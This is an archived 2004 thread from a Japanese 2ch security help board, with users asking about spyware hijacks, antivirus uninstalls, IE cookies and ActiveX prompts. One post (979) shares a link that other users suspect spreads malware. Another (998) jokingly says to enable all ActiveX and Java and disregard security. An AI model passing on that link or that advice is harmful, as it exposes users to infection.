  初心者板 http://pc6.2ch.net/pcqa/ に逝って「エロサイト」で検索
  ↑のまとめサイト http://haiiro.info/my/text/template.html
・Windowsの動作がおかしい→ http://winfaq.jp/
・なんでもいいからとりあえず検索→Google http://www.google.co.jp/
・ページ内検索→ Win:[Ctrl]+[F](Mac:[コマンド]+[F])
・分類不明の質問→[ここらあたりで探してください] http://pc6.2ch.net/pcqa/
・2ちゃんねるの仕様の質問→ http://school4.2ch.net/qa/
・2chスレッドタイトル検索→ http://www.ruitomo.com/~gulab/k.html

972 :名無しさん@お腹いっぱい。:04/06/26 12:51
>>970
通は日本語公式なんぞ落とさないでノルウエーの本家から英語版落として
それを日本語にして使ってる

973 :名無しさん@お腹いっぱい。:04/06/26 12:51
【過去ログ】
part43 http://pc5.2ch.net/test/read.cgi/sec/1087093973/ 前スレ
part42 http://pc5.2ch.net/test/read.cgi/sec/1085705573/
part41 http://pc5.2ch.net/test/read.cgi/sec/1084345263/
part40 http://pc5.2ch.net/test/read.cgi/sec/1082207307/
part39 http://pc3.2ch.net/test/read.cgi/sec/1080480132/
part38 http://pc3.2ch.net/test/read.cgi/sec/1078216939/
part37 http://pc.2ch.net/test/read.cgi/sec/1076728395/
part36 http://pc.2ch.net/test/read.cgi/sec/1075135866/
part35 http://pc.2ch.net/test/read.cgi/sec/1072675686/
part34 http://pc.2ch.net/test/read.cgi/sec/1070035602/
part33 http://pc.2ch.net/test/read.cgi/sec/1068471471/
part32 http://pc.2ch.net/test/read.cgi/sec/1066831852/
Part31 http://pc.2ch.net/test/read.cgi/sec/1064799419/
Part30 http://pc.2ch.net/test/read.cgi/sec/1063081161/
Part29 http://pc.2ch.net/test/read.cgi/sec/1061521014/
Part28 http://pc.2ch.net/test/read.cgi/sec/1059642238/
Part27 http://pc.2ch.net/test/read.cgi/sec/1058283714/
Part26 http://pc.2ch.net/test/read.cgi/sec/1056288419/
Part25 http://pc.2ch.net/test/read.cgi/sec/1054458698/
Part24 http://pc.2ch.net/test/read.cgi/sec/1052123602/
Part23 http://pc.2ch.net/test/read.cgi/sec/1050042334/
Part22 http://pc.2ch.net/test/read.cgi/sec/1047648810/
Part21 http://pc.2ch.net/test/read.cgi/sec/1044609731/
Part20 http://pc.2ch.net/test/read.cgi/sec/1042516088/
Part19 http://pc.2ch.net/test/read.cgi/sec/1040876540/
Part18 http://pc.2ch.net/sec/kako/1039/10390/1039053088.html

974 :970:04/06/26 12:52
なにが違うんですか?

975 :テンプレ案:04/06/26 12:54
>>4-10 変更無し
ただし、>>6中央の番号「〜の【Whois】参照。」に注意


976 :名無しさん@お腹いっぱい。:04/06/26 12:57
>>974
基本的に変わっていない
当スレの1だけリンクが古いまま張られたから念のためさ

977 :976:04/06/26 12:59
失敬、番号見間違えた
無かったことに

978 :名無しさん@お腹いっぱい。:04/06/26 14:05
スパイウェアを削除するためにSpybotをダウンロードして
スキャン、そして削除をおこなったのですが、何度やっても
Common hijacker というものが残ってしまいます。
症状はホームのアドレスが res://nihms.dll/index/html#96676
というものに変わってしまい、さらに広告が出てしまうものです。
OSは2000です。対処法を教えてください。お願いします。

979 :名無しさん@お腹いっぱい。:04/06/26 14:11
>>978
質問する前によく調べたか?(w
「Common hijacker」
http://ptcollection.inhost2.info/?link=page02

980 :名無しさん@お腹いっぱい。:04/06/26 14:18
>>978
言いずらいけど対処はかなり困難かも知れません。

「被害対策」で研究中。
ttp://higaitaisaku.web.infoseek.co.jp/cgi-bin/cbbs.cgi?mode=all&namber=3673&type=0&space=0&no=2#3673

これは、解決した人の例です。
ttp://higaitaisaku.web.infoseek.co.jp/cgi-bin/cbbs.cgi?mode=all&namber=30513&type=0&space=0&no=0

参考にしてがんばってみてください。

>>979
危険なサイトかな?

981 :名無しさん@お腹いっぱい。:04/06/26 15:14
>>979
時間, イベント, 侵入者, カウント
2004.06.26 15:12:46, TCP_Port_Scan, 81.9.3.75, 1

[攻撃準備調査] このシグネチャは、あるコンピュータが、攻撃対象のコンピュータの4つ以上の
異なる TCP ポートにアクセスを試みるとき検出されます

982 :名無しさん@お腹いっぱい。:04/06/26 15:31
質問です、ノートンお試し版の2003をアンインストールしているのですが
途中で「サービスを停止する権限を持っていることを確認してください」
となりアンインストールできないんですがどうしたらいいのでしょうか?

983 :名無しさん@お腹いっぱい。:04/06/26 15:36
サイト閲覧の新種ウイルス=マイクロソフトの欠陥悪用

 【シリコンバレー25日時事】米マイクロソフトの製品の欠陥を悪用し、
ウェブサイトを閲覧しただけで感染する可能性のある「ダウンロード・ジェクト」や
「JSスコブ」などと呼ばれる新種のウイルスが25日までに登場し、同社やウイルス対策の
専門家らが注意を呼び掛けている。
 マイクロソフトによると、同社製閲覧ソフト「インターネット・エクスプローラー(IE)」の利用者が
不正なプログラムを仕掛けられたサイトを閲覧すると、知らないうちにウイルス感染する恐れがある。
ただし、基本ソフト(OS)「ウィンドウズXP」の欠陥を一括して修正する「サービスパック2」を導入していれば危険はないとしている。
 専門家らによると、一部の有名サイトがこの感染拡大に利用されていたケースがあったという。
感染すると、キー入力が勝手に記録され、クレジットカード番号などが盗まれる恐れがある。
感染に利用されている3つの欠陥のうち1つは更新プログラムがまだ提供されておらず、
IEのセキュリティー設定を最高にするなどの対応も必要という。 

[時事通信社]

984 :名無しさん@お腹いっぱい。:04/06/26 15:42
IE6.0でCookieの削除を行っても、Yahooなどの検索サイトで相変わらずCookieが出てしまうのですが
これはCookiesフォルダのindex.datのせいでしょうか?
このファイルだけは削除できないのですが・・・・・・

985 :名無しさん@お腹いっぱい。:04/06/26 15:50
お教え下さい。IE6.0を使っているのですが何時からか「ツール」→「インターネ
ット」でSSLの設定が出来なくなってしまいました。もし同様の状況を解決された
方いらっしゃいましたらお教え下さい。

986 :名無しさん@お腹いっぱい。:04/06/26 15:51
>>984
         ●●                        ●●                ● ●
     ● ●   ●                     ●   ● ●            ●  ●
    ●  ●   ●                     ●   ●   ●          ●    ●
   ●     ●●                        ●●     ●         ●     ●
  ●                                         ●        ●      ●
  ●                                          ●       ●       ●
 ●                 ●●●●●●                 ●      ●        ●
 ●                 ●      ●                 ●
 ●                 ●      ●                 ●
 ●                 ●       ●                 ●      ●●●●●●
 ●                 ●       ●                 ●         ●   ●
 ●                ●        ●                 ●         ●●●
  ●               ●         ●                ●          ●
  ●              ●         ●               ●          ●
   ●             ●          ●              ●           ●
    ●           ●●●●●●●●●             ●           ●
     ●          ●           ●            ●
                ●           ●



987 :名無しさん@お腹いっぱい。:04/06/26 15:58
>>979

ウィルス貼るなこのぼけ!!


988 :名無しさん@お腹いっぱい。:04/06/26 16:45
>>984

Yahooの検索フォームなどで、ダブルクリックすると前に
検索した内容がでるということでしょうか?
それは、消したい履歴のとこにマウスポインタを合わせて
deleteキーを押せば削除できます。

989 :名無しさん@お腹いっぱい。:04/06/26 16:49
>>982

http://www.trendmicro.com/jp/support/vbc/vb-uninstall.htm
とりあえずこれ、読んでやってください。
だめなら、フォームに質問書いて送信するといいです。


990 :978:04/06/26 16:51
>>980
アドバイスありがとうございます。
かなり深刻なモノみたいですね…
正直今の僕のレベルで考えるとスパイウェアの駆除は
非常に難しそうです。いろいろと調べてみようと思うのですが
このままの状態のパソコンでネットに接続するのは危険なんでしょうか?

991 :名無しさん@お腹いっぱい。:04/06/26 16:57
この前ウイルスかかって全部削除できたんだけど
それからほぼ毎回ウェブ開くごとにactive Xがどうたらって出てくるようになったんですけど
どうすれば出てこなくなりますか?

992 :名無しさん@お腹いっぱい。:04/06/26 17:26
>>990

スパイウェアについて説明してるとこがあるんで
よくよんどいてください。削除難しいもんもあるけど
たいていのもんはspybot, ad aware両方つかえば
掃除できます。つかいかたもかいてあります

http://higaitaisaku.web.infoseek.co.jp/menu5.html

993 :名無しさん@お腹いっぱい。:04/06/26 17:27
>>991

ツール−インターネットオプション−詳細設定で
既定値にもどすにしてみてください

994 :991:04/06/26 17:56
>>993
やってみたけどだめみたいです。
active Xコントロールやプラグインなどのソフトウェアを実行できるようにしますか?
って出てきてハイ押すとactiveXコントロールにスクリプトがアクセスしてるのでアクセスできるようにしますか?
みたいなこと出てきてハイ押しても何も起こらないし何なんだろう



995 :名無しさん@お腹いっぱい。:04/06/26 18:01
>>994
なんでだろう。なんでだろう。

996 :名無しさん@お腹いっぱい。:04/06/26 18:04
>>994
「みたいなこと」ではなく、正確に書けよ。クズが。

997 :名無しさん@お腹いっぱい。:04/06/26 18:07
>>984
index.datはWindowsのIE履歴ファイル。MRU Blaster、Regseeker、
Free History Erasorのようなツールを使わないと削除できない。
セキュ的にはともかく、プライバシー的には定期的な削除を勧める。



998 :名無しさん@お腹いっぱい。:04/06/26 18:12
>>994
確認メッセージが出なければいいんだな?
めんどうだからActiveXをすべて有効に。ついでにjavaもすべて有効に汁!
セキュリティ?そんなもんは知らん。w

999 :名無しさん@お腹いっぱい。:04/06/26 19:47
怪しいURLはクリックする前にブラクラチェッカーで検査することをお薦めします。
http://kanteikumiai.netfirms.com/cgi-bin/LBCC/lbcc.cgi?


1000 :名無しさん@お腹いっぱい。:04/06/26 20:02
(*´Д`)千

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

310 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)